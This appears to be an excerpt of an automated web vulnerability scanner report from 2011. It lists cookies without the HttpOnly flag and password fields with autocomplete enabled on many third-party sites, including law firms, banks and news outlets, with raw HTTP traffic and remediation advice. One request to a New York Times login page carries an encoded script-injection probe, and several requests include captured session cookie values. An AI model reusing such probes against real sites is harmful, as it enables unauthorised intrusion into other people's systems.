
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.porterwright.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1160; PortletId=50001; SiteId=1111; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=smrnyb45jqc30onlx2jz0z45; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; ZoneId=7; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utma=221978393.1924349939.1305202915.1305202915.1305202915.1; __utmb=221978393.1.10.1305202915; __utmc=221978393; __utmz=221978393.1305202915.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:22:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=0; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 462
Content-Length: 462

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
404
</title></head>
<body MS_POSITIONING="FlowLayout">

<form name="Form1" method="post" acti
...[SNIP]...

14.157. https://www.wellsfargo.com/jump/theprivatebank/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.wellsfargo.com
Path:	/jump/theprivatebank/index

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=860BCE3A6686392; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
wcmcookiewf=2YvRNL1DhnQJXpvqtrRMH62pV5nkJ3W9wswYr5TSXhRqMGc2yXqQ!-1621466656; domain=.wellsfargo.com; path=/; secure
wfacookie=B-20110512040747952746006; domain=.wellsfargo.com; expires=Sunday, 09-May-2021 11:07:47 GMT; path=/
ISD_WCM_COOKIE=876747786.16927.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

15. Password field with autocomplete enabled previous next
There are 23 instances of this issue:

https://cle-files.tuckerellis.com/
https://cle-files.tuckerellis.com/register
https://investor.kkr.com/Login.aspx
https://investor.kkr.com/Login.aspx
https://investor.kkr.com/Login.aspx
https://investor.kkr.com/Login.aspx
http://media.ft.com/h/subs.html
http://media.ft.com/j/common.js
https://myaccount.nytimes.com/auth/login
http://secniche.org:2082/tmp/secniche/webalizer//usage_201105.html
https://secure.reportingsystem.com/TPG/index.cfm
https://secure.reportingsystem.com/carlyle/
https://webmail-us.mimecast.com/webMail/login.jsp
http://www.digiware.net/
http://www.gobignetwork.com/funding
http://www.huroncapital.com/secure/
http://www.pillsburylaw.com/
http://www.pillsburylaw.com/index.cfm
http://www.pillsburylaw.com/index.cfm
http://www.privateequityinfo.com/
http://www.privateequityinfo.com/forgotpassword.php
http://www.privateequityinfo.com/product_details.php
http://www.soundpatheview.com/

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

15.1. https://cle-files.tuckerellis.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://cle-files.tuckerellis.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://cle-files.tuckerellis.com/login

The form contains the following password field with autocomplete enabled:

user[password]

Request

Response

15.2. https://cle-files.tuckerellis.com/register previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://cle-files.tuckerellis.com
Path:	/register

Issue detail

The page contains a form with the following action URL:

https://cle-files.tuckerellis.com/register

The form contains the following password fields with autocomplete enabled:

user[password]
user[password_confirmation]

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Thu, 12 May 2011 12:25:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: _filetransfer_session=9f3e69b83e302794ac0d585e9faf9b16; path=/; expires=Thu, 19 May 2011 12:25:59 GMT; HttpOnly
Status: 200
ETag: "a849a16be06d2272b0f50b58f60ebb30"
X-Runtime: 36
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta htt
...[SNIP]...
</p>

<form action="/register" method="post"><div style="margin:0;padding:0;display:inline">
...[SNIP]...
<dd><input class="required password" id="user_password" name="user[password]" size="25" type="password" /></dd>
...[SNIP]...
<dd><input equalTo="#user_password" id="user_password_confirmation" name="user[password_confirmation]" size="25" type="password" /></dd>
...[SNIP]...

15.3. https://investor.kkr.com/Login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://investor.kkr.com
Path:	/Login.aspx

Issue detail

The page contains a form with the following action URL:

https://investor.kkr.com/Login.aspx?ReturnUrl=%2fBusyBoxDotNet.axd%3fres%3dFadingCircles.gif%26noGzip%3d1&res=FadingCircles.gif&noGzip=1

The form contains the following password field with autocomplete enabled:

ctl00$MainContent$loginCtl$Password

Request

GET /Login.aspx?ReturnUrl=%2fBusyBoxDotNet.axd%3fres%3dFadingCircles.gif%26noGzip%3d1&res=FadingCircles.gif&noGzip=1 HTTP/1.1
Host: investor.kkr.com
Connection: keep-alive
Referer: https://investor.kkr.com/Login.aspx?ReturnUrl=%2fDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:06:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Content-Length: 13726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<body onload="MasterPage_OnLoad()" onunload="MasterPage_OnUnload()">
<form name="aspnetForm" method="post" action="Login.aspx?ReturnUrl=%2fBusyBoxDotNet.axd%3fres%3dFadingCircles.gif%26noGzip%3d1&res=FadingCircles.gif&noGzip=1" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$MainContent$loginCtl$Password" type="password" id="ctl00_MainContent_loginCtl_Password" class="fields-email" />
<span id="ctl00_MainContent_loginCtl_RequiredFieldValidator2" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

15.4. https://investor.kkr.com/Login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://investor.kkr.com
Path:	/Login.aspx

Issue detail

The page contains a form with the following action URL:

https://investor.kkr.com/Login.aspx?ReturnUrl=%2fBusyBoxDotNet.axd%3fres%3dBBDN.js%24YAHOO.js%24dom.js%24event.js%24animation.js%24BrowserSniff.js%24Common.js%24BusyBox.js%26noGzip%3d1&res=BBDN.js%24YAHOO.js%24dom.js%24event.js%24animation.js%24BrowserSniff.js%24Common.js%24BusyBox.js&noGzip=1

The form contains the following password field with autocomplete enabled:

ctl00$MainContent$loginCtl$Password

Request

GET /Login.aspx?ReturnUrl=%2fBusyBoxDotNet.axd%3fres%3dBBDN.js%24YAHOO.js%24dom.js%24event.js%24animation.js%24BrowserSniff.js%24Common.js%24BusyBox.js%26noGzip%3d1&res=BBDN.js$YAHOO.js$dom.js$event.js$animation.js$BrowserSniff.js$Common.js$BusyBox.js&noGzip=1 HTTP/1.1
Host: investor.kkr.com
Connection: keep-alive
Referer: https://investor.kkr.com/Recovery.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:06:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Content-Length: 13884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<body onload="MasterPage_OnLoad()" onunload="MasterPage_OnUnload()">
<form name="aspnetForm" method="post" action="Login.aspx?ReturnUrl=%2fBusyBoxDotNet.axd%3fres%3dBBDN.js%24YAHOO.js%24dom.js%24event.js%24animation.js%24BrowserSniff.js%24Common.js%24BusyBox.js%26noGzip%3d1&res=BBDN.js%24YAHOO.js%24dom.js%24event.js%24animation.js%24BrowserSniff.js%24Common.js%24BusyBox.js&noGzip=1" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$MainContent$loginCtl$Password" type="password" id="ctl00_MainContent_loginCtl_Password" class="fields-email" />
<span id="ctl00_MainContent_loginCtl_RequiredFieldValidator2" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

15.5. https://investor.kkr.com/Login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://investor.kkr.com
Path:	/Login.aspx

Issue detail

The page contains a form with the following action URL:

https://investor.kkr.com/Login.aspx?ReturnUrl=%2fDefault.aspx

The form contains the following password field with autocomplete enabled:

ctl00$MainContent$loginCtl$Password

Request

GET /Login.aspx?ReturnUrl=%2fDefault.aspx HTTP/1.1
Host: investor.kkr.com
Connection: keep-alive
Referer: https://investor.kkr.com/investor/login.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:06:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Content-Length: 13643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<body onload="MasterPage_OnLoad()" onunload="MasterPage_OnUnload()">
<form name="aspnetForm" method="post" action="Login.aspx?ReturnUrl=%2fDefault.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$MainContent$loginCtl$Password" type="password" id="ctl00_MainContent_loginCtl_Password" class="fields-email" />
<span id="ctl00_MainContent_loginCtl_RequiredFieldValidator2" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

15.6. https://investor.kkr.com/Login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://investor.kkr.com
Path:	/Login.aspx

Issue detail

The page contains a form with the following action URL:

https://investor.kkr.com/Login.aspx?ReturnUrl=%2fBusyBoxDotNet.axd%3fres%3dmaskBG.png%26noGzip%3d1&res=maskBG.png&noGzip=1

The form contains the following password field with autocomplete enabled:

ctl00$MainContent$loginCtl$Password

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:06:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Content-Length: 13712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<body onload="MasterPage_OnLoad()" onunload="MasterPage_OnUnload()">
<form name="aspnetForm" method="post" action="Login.aspx?ReturnUrl=%2fBusyBoxDotNet.axd%3fres%3dmaskBG.png%26noGzip%3d1&res=maskBG.png&noGzip=1" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$MainContent$loginCtl$Password" type="password" id="ctl00_MainContent_loginCtl_Password" class="fields-email" />
<span id="ctl00_MainContent_loginCtl_RequiredFieldValidator2" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

15.7. http://media.ft.com/h/subs.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://media.ft.com
Path:	/h/subs.html

Issue detail

The page contains a form with the following action URL:

https://registration.ft.com/registration/barrier

The form contains the following password field with autocomplete enabled:

password

Request

GET /h/subs.html HTTP/1.1
Host: media.ft.com
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUserTrack=173.193.214.243.1305198170970491; AYSC=_04dc_13USA_14USA_15us_17mid%2Batlantic_18washington_24north%2Bamerica_25high_26202_27PVT_99S_; GZIP=1; opFTData=%26v%3D1; opTrackSess=%26t%3D1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:03:17 GMT
Content-Type: text/html; charset=utf-8
ETag: "812-4725d31c"
Last-Modified: Mon, 29 Oct 2007 12:33:32 GMT
Accept-Ranges: bytes
Server: Apache/1.3.37
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Connection: keep-alive
Content-Length: 2066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
$Id: hdr_subscribe_content.html,v 1.30 2007/10/29 12:33:32 taylorm Exp $
...[SNIP]...
<noscript>
<form name="loginForm" action="https://registration.ft.com/registration/barrier" method="post" id="loginForm"><div class="login-head">
...[SNIP]...
<label class="password">Password<input type="password" value="" class="text" name="password" id="password"/> </label>
...[SNIP]...

15.8. http://media.ft.com/j/common.js previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://media.ft.com
Path:	/j/common.js

Issue detail

The page contains a form with the following action URL:

https://registration.ft.com/registration/barrier/login/

The form contains the following password field with autocomplete enabled:

'+SUBSCRIPTION_PASSWORD_INPUT_ID+'

Request

GET /j/common.js HTTP/1.1
Host: media.ft.com
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:48 GMT
Expires: Thu, 12 May 2011 13:24:22 GMT
Last-Modified: Fri, 07 May 2010 10:51:52 GMT
Cache-Control: max-age=43200
Content-Type: application/x-javascript
ETag: "6ef4-4be3f0c8"
Accept-Ranges: bytes
Server: Apache/1.3.37
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Content-Length: 28404

var USER_FIRST_NAME="FNAME";var USER_LAST_NAME="LNAME";var USER_EMAIL="EMAIL";var USER_USERNAME="USERNAME";var USER_REMEMBER_ME="REMEMBER";var SUBSCRIPTION_RETURN_VALUE="http://www.ft.com/";var SUBSC
...[SNIP]...
okie.match(/FT_Remember/);var eMail=document.cookie.match(/EMAIL=([^;:]+)/)?RegExp.$1:"Please update";var encodedPageURI=encodeURIComponent(thisPage.thisLoc);var htmlStr="";if(!isLoggedIn){htmlStr=''+'<form id="loginForm" method="post" action="https://registration.ft.com/registration/barrier/login/" name="loginForm">'+'<div class="login-head">
...[SNIP]...
<br/>'+'<input id="'+SUBSCRIPTION_PASSWORD_INPUT_ID+'" name="'+SUBSCRIPTION_PASSWORD_INPUT_ID+'" class="txt" value="'+STRING_ENTER_PASSWORD+'" type="password" /> <input type="image" alt="Log in" src="/login.gif" class="login"/>
...[SNIP]...

15.9. https://myaccount.nytimes.com/auth/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://myaccount.nytimes.com
Path:	/auth/login

Issue detail

The page contains a form with the following action URL:

https://myaccount.nytimes.com/auth/login?URI=http://dealbook.nytimes.com/category/main-topicse7f31%2522%253E%253Cscript%253Ealert%25281%2529%253C/script%253Ed4e86dd7255/mergers-acquisitions/

The form contains the following password field with autocomplete enabled:

password

Request

GET /auth/login?URI=http://dealbook.nytimes.com/category/main-topicse7f31%2522%253E%253Cscript%253Ealert%25281%2529%253C/script%253Ed4e86dd7255/mergers-acquisitions/ HTTP/1.1
Host: myaccount.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4e86dd7255/mergers-acquisitions/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=ABBCA6EE6FB956FC70EF4BEBA92D8B48&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.15.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199607199:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 12 May 2011 11:27:04 GMT
Content-type: text/html; charset=UTF-8
Cache-control: no-cache, must-revalidate
Connection: close
Content-Length: 10696

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
                   <title>Log In - The New York Times</title>
                           <meta http-equiv="Conte
...[SNIP]...
<td class="lastColumn wrap">
<form class="loginForm wrap" method="POST">
<fieldset>
...[SNIP]...
<div class="fieldContainer">
<input type="password" id="password" class="text" name="password" maxlength="32" value="">
<a href="http://www.nytimes.com/forgot" class="rollOver">
...[SNIP]...

15.10. http://secniche.org:2082/tmp/secniche/webalizer//usage_201105.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://secniche.org:2082
Path:	/tmp/secniche/webalizer//usage_201105.html

Issue detail

The page contains a form with the following action URL:

http://secniche.org:2082/login/

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.11. https://secure.reportingsystem.com/TPG/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.reportingsystem.com
Path:	/TPG/index.cfm

Issue detail

The page contains a form with the following action URL:

https://secure.reportingsystem.com/TPG/index.cfm

The form contains the following password field with autocomplete enabled:

Request

Response

15.12. https://secure.reportingsystem.com/carlyle/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.reportingsystem.com
Path:	/carlyle/

Issue detail

The page contains a form with the following action URL:

https://secure.reportingsystem.com/carlyle/

The form contains the following password field with autocomplete enabled:

Request

Response

15.13. https://webmail-us.mimecast.com/webMail/login.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://webmail-us.mimecast.com
Path:	/webMail/login.jsp

Issue detail

The page contains a form with the following action URL:

https://webmail-us.mimecast.com/webMail/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Set-Cookie: JSESSIONID=A558B2D6AC4AE657DD0F627D7073BB13; Path=/webMail; Secure
Content-Type: text/html
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:34:17 GMT
Content-Length: 11504

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Mimecast Login</title>

...[SNIP]...
<td>
<form id="loginForm" method="post" action="/webMail/login" enctype="application/x-www-form-urlencoded">

...[SNIP]...
<div id="divPassword" style="visibility: visible;"><input id="editPassword" type="password" name="password" size="27"/></div>
...[SNIP]...

15.14. http://www.digiware.net/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.digiware.net
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.digiware.net/index.php

The form contains the following password field with autocomplete enabled:

passwd

Request

Response

15.15. http://www.gobignetwork.com/funding previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.gobignetwork.com
Path:	/funding

Issue detail

The page contains a form with the following action URL:

https://www.gobignetwork.com/authentication/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Set-Cookie: _referrer=||||http://www.gobignetwork.com/funding||||5/12/2011 7:01 AM; expires=Sun, 06-May-2012 11:01:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:01:18 GMT
Content-Length: 56329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
<div style="width:280px; margin-left:auto; margin-right:auto;">

<form id="LoginForm1" method="post" action="https://www.gobignetwork.com/authentication/login">
<label for="userName" style="color:#243748; display:block; font-weight:bold;">
...[SNIP]...
</div>
<input id="password" name="password" style="background-color:#FFFFFF;border:1px solid #D8E3EC;font-size:18px;margin-bottom:15px;width:250px;" tabindex="2" type="password" value="" /><br />
...[SNIP]...

15.16. http://www.huroncapital.com/secure/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.huroncapital.com
Path:	/secure/

Issue detail

The page contains a form with the following action URL:

http://www.huroncapital.com/secure/index.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.17. http://www.pillsburylaw.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pillsburylaw.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.pillsburylaw.com/index.cfm?pageID=60

The form contains the following password field with autocomplete enabled:

pcpassword

Request

Response

15.18. http://www.pillsburylaw.com/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pillsburylaw.com
Path:	/index.cfm

Issue detail

The page contains a form with the following action URL:

http://www.pillsburylaw.com/index.cfm?pageID=60

The form contains the following password field with autocomplete enabled:

pcpassword

Request

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.2.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A21%3A46; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:31:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<div class="box" id="loginbox">

   <FORM action="/index.cfm?pageID=60" id="pcLogin" name="pcLogin" method="post" class="form">
   <h2>
...[SNIP]...
<input id="password-clear" type="text" value="Password" style="display:none;width:94%;"/>
       <input type="password" name="pcpassword" id="pcpassword" value="" class="required" alias="Password" style="width:94%;">
   </label>
...[SNIP]...

15.19. http://www.pillsburylaw.com/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pillsburylaw.com
Path:	/index.cfm

Issue detail

The page contains a form with the following action URL:

http://www.pillsburylaw.com/index.cfm?pageID=60&p=createaccount2

The form contains the following password fields with autocomplete enabled:

password
password2

Request

GET /index.cfm?pageID=60&p=createaccount HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=60
